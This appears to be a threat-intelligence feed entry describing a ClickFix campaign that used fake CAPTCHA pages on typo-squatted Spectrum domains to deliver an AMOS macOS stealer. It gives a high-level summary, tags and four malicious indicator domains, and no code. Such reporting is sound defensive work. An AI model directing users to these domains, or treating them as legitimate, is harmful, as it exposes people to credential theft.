AMOS Variant Distributed Via Clickfix In Spectrum-Themed Dynamic Delivery Campaign By Russian Speaking Hackers

June 4, 2025, 8:46 p.m.

Description

A sophisticated campaign using typo-squatted 'Spectrum' domains has been uncovered, spreading a new Atomic macOS Stealer (AMOS) variant. The attack, disguised as a CAPTCHA verification, employs dynamic payloads based on the victim's operating system. For macOS users, a malicious shell script steals system passwords and downloads an AMOS variant. The script uses native macOS commands to harvest credentials, bypass security, and execute malicious binaries. Russian-language comments in the source code suggest involvement of Russian-speaking cybercriminals. The campaign's delivery sites show flawed logic, indicating hasty assembly. This multi-platform social engineering attack targets both consumer and corporate users, highlighting an increasing trend in cross-platform threats.

External References

https://www.cloudsek.com/blog/amos-variant-distributed-via-clickfix-in-spectrum-themed-dynamic-delivery-campaign-by-russian-speaking-hackers
https://otx.alienvault.com/pulse/68409d645a8736dcd88da7d5
Tags
social engineering
typosquatting
credential theft
clickfix
poseidon
amos
2025-06-04
dynamic payload
spectrum
multi-platform attack
macos stealer

Date

  • Created: June 4, 2025, 7:24 p.m.
  • Published: June 4, 2025, 7:24 p.m.
  • Modified: June 4, 2025, 8:46 p.m.

Indicators

  • spectrum-ticket.net
  • rugmel.cat
  • panel-spectrum.net
  • applemacios.com
Download all indicators here!

Attack Patterns

Additional Informations

  • Telecommunications
  • United States of America